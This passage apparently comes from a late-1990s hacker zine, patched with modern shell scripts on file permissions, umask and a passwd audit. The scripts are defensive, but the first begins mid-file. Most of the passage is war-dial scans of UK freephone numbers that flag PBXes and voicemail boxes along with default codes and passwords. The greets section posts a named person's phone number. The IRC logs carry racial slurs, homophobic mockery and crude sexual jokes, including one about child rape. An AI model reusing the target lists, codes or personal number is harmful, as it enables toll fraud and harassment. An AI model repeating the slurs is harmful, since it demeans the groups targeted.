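# octal_to_mode OCTAL: 4755 -> rwsr-xr-x, 644 -> rw-r--r--
octal_to_mode() {
    m=$1
    while [ ${#m} -lt 4 ]; do m=0$m; done  # pad by hand; printf %d would read 0755 as octal
    sp=${m%???}; rest=${m#?}
    d1=${rest%??}; d3=${rest#??}; d2=${rest#?}; d2=${d2%?}
    printf '%s%s%s\n' \
        "$(triplet_chars "$d1" $(( sp & 4 )) s)" \
        "$(triplet_chars "$d2" $(( sp & 2 )) s)" \
        "$(triplet_chars "$d3" $(( sp & 1 )) t)"
}

# The listings from the article (constructed input, not real ls output)
for m in rwxr--r-- rwsr--r-- rwxr-sr-- rwSr--r--; do
    printf '%s -> %s\n' "$m" "$(mode_to_octal "$m")"
done
```

Feed it the second column of `ls -l` when a listing looks odd: a 4644 result (rwSr--r--) says suid is set on something that is not even executable.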
The default mode for a file or directory
--oOo-----------------------------------
The default mode for a file or directory is set with the umask. The umask
uses the numeric system to define its value. To set the umask, you must first
determine the value that you want the files to have. For example, a common
file permission set is 644. The owner has read and write permissions and the
rest of the world has read permission. After the value is determined, then it
is subtracted from 777. Keeping the same example of 644, the value would then
become 133. This value is the umask value. Typically, this value is placed in
a system file that is read when a user first logs on. After the value is set,
all files created will set their permissions automatically using this value.
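An added example (not from the article) for checking a umask value before it goes into a login file. One caveat a practitioner wants here: the kernel does not subtract the umask, it clears each bit that is set in it, and a new directory starts from 777 while a new file starts from 666 (no execute bits). The 133 value worked out above therefore gives new files 644 as intended, but it also gives new directories 644, which nobody can cd into; the usual way to get 644 files is umask 022, which leaves directories at 755. The functions below do the arithmetic for both cases.

```shell
#!/bin/sh
# umask arithmetic (added example). A new file is created from 666 and a new
# directory from 777; the bits set in the umask are cleared from that base.
# All values are three-digit octal strings as the umask command prints them.

# effective_mode BASE UMASK: BASE with the UMASK bits cleared
effective_mode() {
    printf '%03o\n' $(( 0$1 & ~0$2 ))
}
new_file_mode() { effective_mode 666 "$1"; }
new_dir_mode()  { effective_mode 777 "$1"; }

# umask_from_777 MODE: the "777 minus the wanted mode" recipe from the text (644 -> 133)
umask_from_777() {
    printf '%03o\n' $(( 0777 & ~0$1 ))
}

# check_umask UMASK: report what files and directories will get, and warn when
# the owner loses execute on directories or when group/other keep write access
check_umask() {
    f=$(new_file_mode "$1"); d=$(new_dir_mode "$1")
    printf 'umask %s: new files %s, new directories %s\n' "$1" "$f" "$d"
    [ $(( 0$d & 0100 )) -ne 0 ] || echo "  WARNING: owner cannot cd into new directories"
    [ $(( 0$f & 0022 )) -eq 0 ] || echo "  WARNING: group/other can write new files"
}

# Compare the recipe's result with the conventional value
check_umask "$(umask_from_777 644)"
check_umask 022
check_umask 077
```

umask 077 is the value to reach for on a box where nobody else should read what you create: files come out 600 and directories 700.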
Passwords: a second look
--oOo-------------------
The system stores the user's encrypted password in the /etc/passwd file. If
the system is using a shadow password system, the value placed in this field
will be an x. A value of * blocks login access to the account, as * is not a
valid character for an encrypted field. This field should never be edited
(after it is set up) by hand; a program such as passwd should be used so
that proper encryption takes place. If this field is changed by hand, the
old password is no longer valid and, more than likely, will have to be
changed by root.
NOTE: if the system is using a shadow password system then a separate file
exists called /etc/shadow that contains the (encrypted) passwords.
A password is a secret set of characters set up by the user that is known
only by the user. The system asks for the password, compares what is input to
the known password, and, if they match, confirms that the user is who they
say they are and lets them access the system. I can't stress enough - do not
write down your password! It might be hard for a remote hax0r to see it but
anyone at your comp will immediately gain your permissions.
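A check in the spirit of pcheck.tar.Z from the tools list, written here as an added example (it is not pcheck itself and not from the article): an awk pass over passwd-format lines that flags the conditions this section describes, an empty password field (anyone can log in as that account), a hash still sitting in /etc/passwd instead of /etc/shadow, a second uid 0 account, and lines with the wrong number of fields. The sample lines are constructed, with a fake 13-character hash, and are not a real passwd file.

```shell
#!/bin/sh
# /etc/passwd sanity check (added example). Fields are
# name:password:uid:gid:gecos:home:shell. In the password field, x means the
# hash is in /etc/shadow, * (or a leading !) means the account cannot log in,
# and an empty field means no password is asked for at all.

# write_sample_passwd: constructed sample lines in passwd format, not a real file
write_sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
zomba:x:1000:100:zomba:/home/zomba:/bin/bash
guest::1001:100:guest:/home/guest:/bin/sh
legacy:FAKEDESHASH13:1002:100:legacy:/home/legacy:/bin/sh
toor:x:0:0:second root:/:/bin/sh
broken:x:1003:100
EOF
}

# audit_passwd FILE: one finding per line on stdout; exit status 1 when
# anything was found, so it can gate a cron job or a login script
audit_passwd() {
    awk -F: '
        NF != 7 { printf "%s: malformed line (%d fields)\n", $1, NF; found++; next }
        $2 == "" { printf "%s: empty password field, no password needed to log in\n", $1; found++ }
        $2 != "" && $2 != "x" && $2 != "*" && $2 !~ /^!/ {
            printf "%s: password hash stored in passwd, not shadowed\n", $1; found++ }
        $3 == 0 && $1 != "root" { printf "%s: uid 0 but not root\n", $1; found++ }
        END { if (found) exit 1 }
    ' "$1"
}

# Run it over the constructed sample (use /etc/passwd on a real system)
sample=$(mktemp)
write_sample_passwd > "$sample"
audit_passwd "$sample" || echo "problems found, fix them with passwd/vipw, not by hand-editing"
rm -f "$sample"
```

The uid 0 rule is the one that catches a back door left behind after a compromise; the not-shadowed rule catches a system that was migrated to shadow passwords but still has old entries that crack can read directly.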
Related WWW sites
--oOo------------
www.l0pht.com
www.rhino9.com
www.cert.org
www.geek-girl.com/bugtraq
members.xoom.com/phuk <-- soon all tewls mentioned in this file will be here!
www.rootshell.com
www.epidemik.org <-- not up yet but be sure to look out for it!
Basically, go to any site that offers exploits/security advisories and read
them, if any are relevant to your system, make sure you install any patches
available.
Greets and shouts
--oOo------------
Werd to the darkcyde collective, extra shouts to hybrid, bodie and force. Also
greetz to [JaSuN], darkflame, xio, PUBLiC NUiSANCE, shadow, gossi, elf,
downtime, kryptus, and a BIG shout to Oliver Tate....i mean erm...CFiSH..where the
hell did I put his number?...ahh here it is: (+44) 0181 9798895..oops, d1d I s4y
th4t 0uT l0UD?...heh (c) b4b0 1999.
-----------oOo------------ EOF ------------oOo-----------
********************************
*** zomba's bonus ph0newarez ***
********************************
895xxx Hand Scan April/May '99 by z0mba (000-310)
0800-895-004 Please Enter Pin
0800-895-006 CARRIER
0800-895-007 ?
0800-895-008 Network Associates Technical Support - www.nai.com
0800-895-011 CARRIER
0800-895-012 CARRIER
0800-895-013 Live - "OCI, this is Ron"
0800-895-014 Some shitty voice attendant - hit 0, eXt, # to xfer.
0800-895-015 Not in service.
0800-895-016 LOL
0800-895-017 Beep then live.
0800-895-020 Tightman (or summit)
0800-895-024 CARRIER
0800-895-026 beeeeep, then live
0800-895-030 CARRIER
0800-895-031 beep, beep, live (german)
0800-895-033 VMB (press #)
0800-895-035 Syflex network (?)
0800-895-036 busy
0800-895-037 beep, beep, live (german bastid!)
0800-895-038 ditt0
0800-895-039 CARRIER
0800-895-043 CARRIER
0800-895-044 German
0800-895-045 no answer
0800-895-049 Spacelabs Medical Employees line!
0800-895-050 Foreign (german?)
0800-895-051 FAX
0800-895-054 no answer
0800-895-056 PBX VMS, hit *, dial pwd, dial mailbox (strange!)
0800-895-059 VISA assistants centre
0800-895-060 loud beep, foreign, c5?
0800-895-061 AUDIX Direct, try 8xxx area
0800-895-062 8oo number cannot be reached from your calling area
0800-895-065 spanish line - time-share
0800-895-067 American Express Platinum Card service - rich cunts
0800-895-071 Please enter your PIN
0800-895-072 PBX VMS, loud clicks, press #
0800-895-076 PBX
0800-895-078 VISA Global Refund Service
0800-895-079 busy
0800-895-080 CARRIER
0800-895-081 no answer
0800-895-082 VISA International Service Centre
0800-895-084 Live
0800-895-086 PBX VMS Message Centre
0800-895-087 Live
0800-895-088 no answer
0800-895-090 PBX
0800-895-093 CARRIER
0800-895-095 VISA Global Refund Service
0800-895-099 CARRIER
0800-895-101 Please Enter Your PIN
0800-895-102 Live
0800-895-103 Live
0800-895-105 PBX - may be vms in here
0800-895-107 PBX
0800-895-108 busy
0800-895-110 PBX - press 2 for conference sales or to book a meeting!
0800-895-111 busy
0800-895-113 t0ne
0800-895-114 invalid service number
0800-895-116 no answer
0800-895-117 The number you have dialed is no longer running a promotion (?)
0800-895-118 Intec International VMB
0800-895-119 CARRIER
0800-895-120 Live
0800-895-121 The number you have dialed, 267-3551, has been changed
0800-895-122 CARRIER
0800-895-126 foreign
0800-895-128 B & B agency of Boston
0800-895-129 Live
0800-895-130 Its a beautiful day in the villages, where may I direct your call?
0800-895-131 VMB Messagecentre
0800-895-133 CARRIER/FAX
0800-895-134 AUDIX Directo - try 5xxx, 8xxx areas
0800-895-137 Please enter your speed dial #... - cockney voice
0800-895-142 ring ring, ring ring, ring ring
0800-895-144 Live
0800-895-146 Invalid service number
0800-895-151 PBX
0800-895-152 no answer
0800-895-155 CARRIER
0800-895-156 Conference Centre
0800-895-159 Cybex International PBX
0800-895-160 no answer
0800-895-163 Live
0800-895-164 CARRIER
0800-895-165 PBX MM Switch - outdial disabled
0800-895-169 Voicemail Gateway - try 5009#, LOL!
0800-895-172 weird
0800-895-177 Live - Customer Services
0800-895-179 CARRIER on a c5 line
0800-895-181 strange
0800-895-182 Invalid service number
0800-895-183 PBX
0800-895-185 AUDIX eXt 45895 is not available
0800-895-187 answerfone www.executiveresorts.com
0800-895-188 Fax/Carrier
0800-895-191 Busy
0800-895-192 CARRIER
0800-895-193 Live
0800-895-194 CARRIER
0800-895-195 CARRIER
0800-895-198 "Hello Jennifer speaking..."
0800-895-199 Crappy PBX
0800-895-200 PBX
0800-895-201 Live
0800-895-203 # not in service
0800-895-204 just beeps
0800-895-207 KDD
0800-895-208 CARRIER
0800-895-211 KDD
0800-895-212 # disconnected
0800-895-216 Busy
0800-895-217 no answer
0800-895-218 KDD
0800-895-219 Please dial your personal ID number...
0800-895-220 Please enter your PIN
0800-895-221 Live
0800-895-222 weird beeps
0800-895-225 Please dial your personal ID number...
0800-895-226 KDD international telephone office in Japan
0800-895-227 Foreign
0800-895-228 Live
0800-895-229 no answer
0800-895-231 Please dial your personal ID number...
0800-895-232 KDD
0800-895-234 Please dial your personal ID number...
0800-895-235 KDD
0800-895-236 Please enter your card number and PIN now
0800-895-238 no answer
0800-895-240 Weird
0800-895-243 French
0800-895-244 Welcome to Access International, enter authorisation code now.
0800-895-245 KDD
0800-895-246 CARRIER
0800-895-247 Please dial your personal ID number...
0800-895-249 Please dial your personal ID number...
0800-895-250 not available from your calling area.
0800-895-251 KDD
0800-895-252 KDD
0800-895-253 no answer
0800-895-255 Christian somethin'
0800-895-256 PBX - french and english
0800-895-258 KDD
0800-895-259 no longer in service
0800-895-260 Please dial your personal ID number...
0800-895-261 KDD
0800-895-262 KDD
0800-895-263 Live
0800-895-264 ID
0800-895-265 Live
0800-895-266 ID
0800-895-267 KDD
0800-895-268 Live
0800-895-269 KDD
0800-895-271 KDD
0800-895-272 Live
0800-895-274 KDD
0800-895-276 CARRIER
0800-895-277 no answer
0800-895-278 no answer
0800-895-279 CARRIER
0800-895-280 no answer
0800-895-281 CARRIER
0800-895-284 KDD
0800-895-285 KDD
0800-895-286 no answer
0800-895-287 Live
0800-895-288 no answer
0800-895-289 KDD
0800-895-291 no answer
0800-895-292 no answer (does no-one answer the fuckin' fone anymore?)
0800-895-293 C00l, "account # and press pound", "password and press pound"
0800-895-294 KDD
0800-895-299 Commerce Bank - Live
0800-895-301 CARRIER
0800-895-302 "What Service?"
0800-895-303 CARRIER
0800-895-306 KDD
0800-895-307 CARRIER
0800-895-310 KDD
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::[ Scan of O8OO 252 XXX ]::::::::[OO--[ by shadow-x ]----------------
-->]OO[::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
0800252001 - bloke answered
0800252003 - fax
0800252016 - communications house answer machine
0800252020 - disaster recovery system
0800252021 - Carrier 3 login attempts
0800252022 - no answer
0800252023 - fax
0800252024 - no answer
0800252026 - no answer
0800252031 - no answer
0800252032 - live
0800252037 - answer machine
0800252038 - web bay distributers *pbx* (voice connector)
0800252039 - bitch answered
0800252040 - busy
0800252041 - live
0800252044 - guinness customer services *VMB* (infostar 24 hour)
0800252048 - bloke answered
0800252049 - no answer
0800252050 - answer machine
0800252055 - no answer
0800252056 - no answer
0800252057 - fax
0800252058 - no answer
0800252059 - kelly services (answer machine 2 digit password)
0800252060 - hospital outpatients answer machine
0800252061 - no answer
0800252070 - bt answering service
0800252071 - live
0800252074 - medics assistance
0800252077 - bloke answered
0800252078 - AT&T comms
0800252079 - bloke answered
0800252080 - stationery office norwich answer machine
0800252081 - answer machine (password 12)
0800252083 - live
0800252086 - answer machine 2 digit
0800252087 - dating agency
0800252088 - hmm something automated hotline
0800252089 - live
0800252094 - no answer
0800252095 - answer machine
0800252097 - bloke answered
0800252098 - no answer
0800252099 - direct services bloke answered
0800252100 - live
0800252102 - answer machine
0800252103 - answer machine
0800252104 - answer machine
0800252105 - answer machine
0800252118 - no answer
0800252121 - (infostar vmb)
0800252125 - no answer
0800252127 - bt answer service
0800252130 - answer machine
0800252134 - no answer
0800252135 - fax service
0800252141 - sutherlands live
0800252147 - live
0800252150 - fairway logistics VMB
0800252153 - Carrier Bad case of security by obscurity (try it!)
0800252154 - fax
0800252157 - no answer
0800252158 - live
0800252160 - engaged
0800252166 - live
0800252167 - no answer
0800252168 - pbx (5402 def) old meridian
0800252170 - pbx
0800252171 - answer machine
0800252172 - live
0800252175 - live
0800252177 - live
0800252179 - answer machine 2 digit
0800252180 - live
0800252181 - answer machine
0800252183 - london uni answer machine
0800252184 - live
0800252185 - no answer
0800252188 - live
0800252192 - live
0800252193 - call diverted to answer machine
0800252195 - answer machine
0800252198 - PBX and VMB meridian
0800252200 - live
0800252201 - Carrier (Noted)
0800252210 - engaged
0800252211 - answer machine 2 digit password
0800252213 - call queue
0800252215 - no answer
0800252216 - no answer
0800252217 - no answer
0800252219 - no answer
0800252220 - answer machine
0800252223 - cannon uk (answer machine)?
0800252225 - no answer
0800252226 - no answer
0800252227 - barclays pbx
0800252228 - live
0800252230 - no answer
0800252231 - barclay pbx
0800252233 - no answer
0800252235 - answer machine
0800252237 - no answer
0800252239 - live
0800252241 - no answer
0800252243 - live
0800252244 - live asks for card number
0800252247 - no answer
0800252248 - VMB
0800252250 - dead
0800252254 - college answer machine
0800252255 - VMB (infostar)
0800252257 - engaged
0800252258 - Carrier Just sits there
0800252260 - no answer
0800252261 - no answer
0800252262 - answer machine
0800252263 - no answer
0800252264 - no answer
0800252265 - no answer
0800252266 - answer machine
0800252268 - BT payphones (answer machine)?
0800252269 - PBX and VMB (infostar)
0800252270 - line busy
0800252272 - answer machine
0800252276 - barclay pbx
0800252280 - live
0800252281 - windows PBX
0800252282 - no answer
0800252283 - no answer
0800252286 - PBX
0800252289 - no answer
0800252291 - bloke
0800252292 - no answer
0800252295 - answer machine
0800252300 - live
0800252303 - no answer
0800252304 - ????? could be a pbx
0800252305 - starstruck again!
0800252307 - call queuing
0800252308 - barclays
0800252312 - carrier? could be a fax
0800252317 - engaged
0800252318 - answer machine
0800252322 - engaged
0800252324 - VMB
0800252325 - no answer
0800252331 - no answer
0800252332 - no answer
0800252333 - barclays
0800252338 - no answer
0800252340 - no answer
0800252341 - no answer
0800252342 - vodaphone recall service
0800252345 - live
0800252346 - no answer
0800252348 - no answer
0800252349 - no answer
0800252351 - carrier? fucked
0800252352 - answer machine 2 digit
0800252355 - live
0800252356 - Carrier buggy
0800252357 - VMB?
0800252358 - live
0800252359 - no answer
0800252361 - live
0800252362 - live
0800252363 - Carrier disconnected now
0800252364 - answer machine
0800252365 - no answer
0800252367 - starstruck advertisement
0800252369 - answer machine
0800252374 - bt business training meridian 7753 no outdial
0800252380 - answer machine
0800252384 - no answer
0800252397 - answer machine
0800252399 - carrier?
0800252400 - answer machine
0800252401 - answer machine
0800252402 - no answer
0800252403 - no answer
0800252404 - answer machine
0800252405 - live
0800252406 - no answer
0800252407 - no answer
0800252408 - no answer
0800252409 - answer machine
0800252410 - VMB
0800252414 - no answer
0800252415 - answer machine
0800252416 - no answer
0800252417 - no answer
0800252418 - answer machine
0800252420 - answer machine 2 digit
0800252423 - no answer
0800252425 - VMB message center
0800252427 - no answer
0800252429 - fax?
0800252430 - no answer
0800252433 - barclays
0800252434 - no answer
0800252436 - answer machine 2 digit
0800252438 - no answer
0800252439 - live
0800252441 - no answer
0800252445 - live
0800252446 - barclay card
0800252447 - answer machine
0800252449 - no answer
0800252453 - no answer
0800252454 - fax?
0800252455 - no answer
0800252460 - no answer
0800252461 - answer machine
0800252465 - answer machine
0800252467 - live
0800252470 - extender?
0800252471 - no answer
0800252472 - live
0800252473 - no answer
0800252474 - fax?
0800252475 - answer machine
0800252477 - answer machine
0800252479 - answer machine
0800252482 - no answer
0800252485 - dating agency
0800252488 - live
0800252489 - live
0800252490 - carrier disconnected now
0800252495 - live
0800252500 - live
0800252502 - live
0800252507 - no answer
0800252511 - MERIDIAN
0800252513 - live
0800252517 - no answer
0800252518 - no answer
0800252520 - answer machine?
0800252521 - live
0800252522 - answer machine
0800252525 - engaged
0800252527 - no answer
0800252530 - answer machine
0800252531 - no answer
0800252534 - live
0800252536 - no answer
0800252538 - no answer
0800252541 - BT payphone sales
0800252544 - no answer
0800252547 - no answer
0800252548 - answer machine?
0800252549 - MERIDIAN
0800252550 - no answer
0800252552 - VMB?
0800252554 - live
0800252555 - VMB
0800252556 - no answer
0800252560 - no answer
0800252561 - PBX
0800252563 - fax
0800252567 - no answer
0800252569 - live
0800252571 - VMB
0800252573 - live
0800252579 - live
0800252584 - bt payment message line
0800252585 - no answer
0800252587 - answer machine
0800252588 - bt phoncard sales MERIDIAN
0800252592 - PBX
0800252593 - no answer
0800252594 - live
0800252596 - live
0800252597 - no answer
0800252599 - live
0800252600 - no answer
0800252601 - answer machine
0800252603 - no answer
0800252604 - no answer
0800252605 - no answer
0800252606 - fax
0800252607 - no answer
0800252608 - live
0800252609 - answer machine 2 digit password
0800252611 - no answer
0800252612 - carrier net internet, disconnects after 1 failed login
0800252613 - no answer
0800252614 - no answer
0800252615 - answer machine 2 digit
0800252617 - no answer
0800252619 - no answer
0800252623 - answer machine 3 digit
0800252624 - answer machine
0800252625 - no answer
0800252627 - no answer
0800252628 - MERIDIAN
0800252632 - no answer
0800252639 - bt payphones
0800252640 - vmb?
0800252641 - no answer
0800252642 - no answer
0800252643 - live
0800252646 - no answer
0800252649 - no answer
0800252651 - live
0800252653 - live
0800252654 - engaged
0800252658 - no answer
0800252663 - live
0800252667 - pbx
0800252668 - no answer
0800252672 - no answer
0800252674 - answer machine
0800252675 - no answer
0800252676 - live
0800252677 - live
0800252679 - no answer
0800252683 - no answer
0800252687 - answer machine
0800252688 - no answer
0800252691 - live
0800252692 - no answer
0800252695 - no answer
0800252696 - no answer
0800252697 - engaged
0800252707 - bt service management center
0800252710 - live
0800252712 - live (some slag)
0800252713 - answer machine
0800252714 - live
0800252716 - answer machine
0800252717 - live
0800252718 - live
0800252723 - answer machine
0800252725 - engaged
0800252726 - live
0800252734 - message paging
0800252735 - live
0800252736 - VMB
0800252739 - live
0800252742 - live
0800252745 - answer machine (2 digit)
0800252746 - carrier buggy
0800252747 - argos direct
0800252750 - live
0800252751 - live ism
0800252753 - live
0800252756 - live
0800252760 - live
0800252761 - Carrier screwed
0800252762 - Carrier dodgy
0800252763 - Carrier dodgy
0800252764 - Carrier dodgy
0800252765 - answer machine
0800252769 - live
0800252772 - answer machine (password 12)
0800252773 - live
0800252775 - answer machine
0800252777 - live
0800252780 - live
0800252781 - bt customer service center
0800252783 - live
0800252784 - bt center
0800252785 - bt service managment center
0800252786 - answer machine
0800252787 - answer machine
0800252788 - live
0800252789 - answer machine
0800252793 - live
0800252795 - live
0800252796 - live
0800252801 - fax
0800252802 - fax
0800252806 - wierd hangs up after click?
0800252809 - T Mark, bloke answered
0800252816 - no answer
0800252818 - answer machine 4 digit password
0800252819 - no answer
0800252829 - no answer
0800252833 - answer machine
0800252834 - talking tesco answer machine
0800252835 - fax?
0800252836 - no answer
0800252838 - no answer
0800252839 - VMB meridian no outdial
0800252840 - hotel reservations answer machine
0800252841 - no answer
0800252842 - no answer
0800252847 - bloke answered (was not very happy with carrier tone)
0800252850 - fault
0800252851 - bitch answered
0800252853 - answer machine
0800252854 - hotel reservations answer machine
0800252855 - no answer
0800252858 - PBX
0800252859 - answer machine
0800252867 - cannot connect
0800252870 - ardvark appliances answer machine 4 digit (mail box locked) could be a VMB
0800252876 - answer machine
0800252880 - Carrier (just sits there)
0800252881 - bitch answered
0800252882 - ross helpline answer machine (could be PBX)
0800252883 - no answer
0800252884 - no answer
0800252889 - "if you are sending a fax please press the send key"
0800252890 - bitch answered
0800252892 - no answer
0800252897 - rent a car usa PBX
0800252902 - woman answered
0800252903 - Powertech information service vmb
0800252904 - no answer
0800252907 - answer machine 2 digit password
0800252908 - Carrier (Noted) netcom
0800252909 - carrier (scrolls garbage)
0800252911 - no answer
0800252912 - no answer
0800252914 - underground caverns? (*7214)
0800252917 - woman answered
0800252918 - Botanic helpline
0800252919 - opperator is engaged
0800252920 - woman answered
0800252925 - the number has changed
0800252931 - no answer
0800252935 - no answer
0800252937 - dial and message vmb?
0800252939 - no answer
0800252941 - no answer
0800252943 - wierd pippy noise (?)
0800252944 - buisness office possible vmb
0800252945 - answer machine
0800252947 - no answer
0800252948 - no answer
0800252953 - bitch
0800252958 - answer machine
0800252960 - calls are being diverted...
0800252962 - no answer
0800252963 - carrier disconnected
0800252964 - bloke answered
0800252968 - no answer
0800252972 - answer machine
0800252973 - bitch
0800252974 - bloke
0800252977 - bitch
0800252978 - no answer
0800252980 - answer machine 2 digit password
0800252986 - no answer
0800252989 - something direct (answer machine)
0800252990 - answer machine (hackable)
0800252991 - no answer
0800252992 - bitch, something hotel
0800252995 - all opperators are engaged...
0800252996 - answer machine
0800252997 - voice connector vmb
0800252999 - bloke answered
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::[ IRC logz ]::::::::[OO--[ by various peeps ]-----------------------
-->]OO[::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
fORCE's quotes of the month - READ THIS SHIT, LOL@!@!"$@!"$!
--oOo----------------------
Now force comes out with some funny shit on IRC, and here is the best of it.
Now please remember that any references to him being gay (or me for that
matter) are just *jokes* and should not be taken seriously! A lot was taken
from logs from when we were pranking various chans including #gay, #gaysex and
#jesus.
[00:41] <fORCE-> feckin internet explorer sucks
[01:11] <fORCE-> kinda, i had a guy telling me he was putting nutella on his
dick
[01:12] <fORCE-> hehe
[01:12] <fORCE-> turned me on!
<z0mba> funniest thing i heard all day
[01:13] <fORCE-> :)
[01:13] <fORCE-> 100% true
[01:13] <fORCE-> sick people on those lines
<z0mba> i take it you hung up pretty sharpish
[01:14] <fORCE-> NO WAY! i ran to the kitchen and go the nutella!
[01:14] <fORCE-> got the
<z0mba> heh
[01:14] <fORCE-> to see what i was missing out on...
<z0mba> so you ended up with a brown knob
<z0mba> hmm
[01:15] <fORCE-> yeah had to shower afterwards :(
[01:39] <fORCE-> browsing pr0n whilst not paying...
<z0mba> life doesn't get any better
[01:39] <fORCE-> if i was getting head right now it would be perfect
<z0mba> you spanking your monkey?
[01:52] * fORCE- moans
<z0mba> that'll be a yes then
[01:53] <fORCE-> no
[01:53] <fORCE-> i *was* but i was premature
[01:53] <fORCE-> :(
<z0mba> sticky keyboard
<z0mba> feck
[01:55] <fORCE-> pheck
[01:06] <fORCE-> ok, what music you into
[01:06] <fORCE-> ?
[01:06] <fORCE->
[01:06] <fORCE-> The Abyssinian Baptist Gospel Choir
[01:06] <fORCE-> ?
<z0mba> oh yeah man, they r0ck
[01:07] <fORCE-> lol
[01:07] <fORCE-> fuckin negros
[01:09] <fORCE-> well i gotta go, you greasy slut
[23:28] <fORCE-> cfish is leet i wish i was as cool as him
<z0mba> ladyboy
[23:33] <fORCE-> word
[23:34] <fORCE-> bangkok chickboy
<z0mba> pegleg motherfuckin' cocksucking wh0re
[23:34] <fORCE-> you know liz hurley?
<z0mba> yeah man, fucked her last week
[23:36] <fORCE-> leet
[23:36] <fORCE-> she comes from where i live
[23:41] <fORCE-> g33k
<z0mba> fux0r you
[23:41] <fORCE-> fr34k
<z0mba> l4m3r
[23:42] <fORCE-> p3gl3g
<z0mba> l4dyb0y
[23:42] <fORCE-> b4ngk0k ch1ckb0y
[23:44] <fORCE-> now i'm really off
[23:44] <fORCE-> the net sucks
[23:44] <fORCE-> i'm never coming back
[23:44] <fORCE-> send me some voice mail nigger
[23:44] <fORCE-> and include c0dez in them
<z0mba> yeah right
[00:40] <fORCE-> oi
[00:40] <fORCE-> pencil dick
<z0mba> y0y0
<z0mba> l4m3w0d
[00:41] <fORCE-> p3nc1ld1c|<
[00:42] <fORCE-> what up
<z0mba> nothin
[00:43] <fORCE-> got any <0d3z?
[23:29] <fORCE-> why 2 of you?
<z0mba> the other is a shell
[23:30] <fORCE-> i see
[23:31] <fORCE-> said the blind man to his deaf dog
[01:04] <fORCE-> you are an experiance rider of the chocolate highway
[01:04] <fORCE-> i have a gimp suit
[01:04] <fORCE-> they are ereet
[01:38] <fORCE-> i love the advery
[01:39] <fORCE-> advert
[01:39] <fORCE-> ooooooooh eight niiiine ooooone FIFTY! FIFTY! FIFTY!
[01:39] <fORCE-> i called it once through a pbx
<z0mba> i know
<z0mba> nutella on dick incident
[01:40] <fORCE-> haha
[01:40] <fORCE-> did i tell ya about me hearing that cfish lamer on there?
<z0mba> no
[01:41] <fORCE-> i heard his voice before on vmbs and i knew his name and
this guy on 0891505050 says "its ollie i'm busting for it so please message
me girls"
[01:41] <fORCE-> i swear it was him
[01:41] <fORCE-> i messaged him but he went straight away
[22:14] <fORCE> hey
[22:14] <fORCE> i love a big veiny cock in my ass
[22:14] <fORCE> i like gangbangs...anyone else?
[22:14] <fORCE> i lost my anal virginity to my dog
[22:15] <fORCE> i got gang raped once by a gang of 1O year olds
* fORCE is now known as fatb0y
[02:27] <fatb0y> i stared at all the boys in the changing rooms and the
showers
[02:27] <fatb0y> i got an erection
[02:27] <fatb0y> and they called me 'boner boy' for the rest of my school
life
[02:28] <fatb0y> i feel so bad
[02:28] <fatb0y> considered suicide
[02:28] <fatb0y> didn't work
[02:28] <fatb0y> so i went to this gay bar
[02:28] <fatb0y> and met some really *nice* people
[02:28] <fatb0y> one was called 'ian'
[02:28] <fatb0y> he took me back to his place and we 'played around'
[02:29] <fatb0y> then he started getting rough
[02:29] <fatb0y> and pinned me down
[02:29] <fatb0y> and penetrated my anus hole
[02:29] <fatb0y> it felt so good
[02:29] <fatb0y> but it also hurt
[02:29] <fatb0y> i bled a fair bit
[02:29] <TweetyBd> do you like to get fucked?
[02:29] <fatb0y> i still get discharge
[02:29] <fatb0y> it was nice
[02:29] <fatb0y> and yes i do
[02:30] <fatb0y> i wish i had a vagina
[02:30] <fatb0y> so much
[02:30] <fatb0y> so do you guys bleed a lot?
[02:30] <fatb0y> or am i a freak?
[21:31] <fORCE> my mum rekons jesus was an alien
[21:32] <lambda> NM: it would be impossible for that to be done and for a
huge inverse parralelism to occur
[21:32] *** Quits: NM (Leaving)
[21:32] <fORCE> i read that jesus was a mafia boss once
[21:32] <lambda> hahhaha
[21:34] <fORCE> i read that jesus likes it hardc0re up his rear dorr
[21:34] <fORCE> door even
TONEKILLA } b1tch1ng
-----------------
(tonekill4): why have you been such a bitch to me recently?
([JaSuN]): eh?
([JaSuN]): i have not
([JaSuN]): if you mean about darkcyde - hybrid told me who to allow ops via
bot
(tonekill4): have too
(tonekill4): removing me from op
(tonekill4): and shit
([JaSuN]): look dude, its not upto me
(tonekill4): thats being a bitch
([JaSuN]): well...not my choice
(tonekill4): specially when everyone was turning on me
(tonekill4): haha
(tonekill4): hybrid says jump
([JaSuN]): besides, even if you have op on fatality...slut would deop you
(tonekill4): everyone follows the master god's command
(tonekill4): i fucking ran that hcnanel for 2 months
(tonekill4): kept you and your bot opped
(tonekill4): and then bewm&(*!^$#*&&$*
([JaSuN]): sorry...i don't have any say
(tonekill4): well...
(tonekill4): still...
([JaSuN]): i just put the fucking thing in there
([JaSuN]): sorry!
(tonekill4): i mean i fucking ran that channel with no problem
(tonekill4): then all the sudded
([JaSuN]): tell hybrid then
(tonekill4): everyone fucking jumps around hybrid like he's god and just
fucking turns on me
(tonekill4): i cant talk to him
(tonekill4): he has me on ignore
(tonekill4): so i cant work the shit out
(tonekill4): i halfway told him completly how to run a bot
(tonekill4): he asked me ? after ?
(tonekill4): and i helped him
(tonekill4): then all the sudded, he starts
([JaSuN]): owww.
(tonekill4): and when i ban him back, he kicks me out
(tonekill4): and takes me off op and shit
([JaSuN]): i see.
(tonekilla): but, since you are one of hybrid's adoring fans, forget it.
([JaSuN]): look
(tonekilla): and downtime is my fucking best friend
([JaSuN]): i don't support anyone or anything...
(tonekilla): and he does the same
([JaSuN]): i just was told who to give ops, thats all.
([JaSuN]): I don't stick up for anyone against other ppl I know and I don't
like arguments about it!
(tonekilla): ok
(tonekilla): ok
([JaSuN]): so..
([JaSuN]): i am still kewl with you, I have no problems.
(tonekilla): well ok
(tonekilla): i guess i remove ban then heh
(tonekilla): i thought it was your idea
(tonekilla): =>
([JaSuN]): about what?!
(tonekilla): come in
(tonekilla): #telkore
(tonekilla): oh
(tonekilla): and do you know the command on an old v. eggie to list all the
channels its in?
([JaSuN]): .status
([JaSuN]): that will tell you
(tonekilla): thanx
([JaSuN]): np
(tonekilla): yay
(tonekilla): heh
(tonekilla): i had forgotton a channel
---------------------
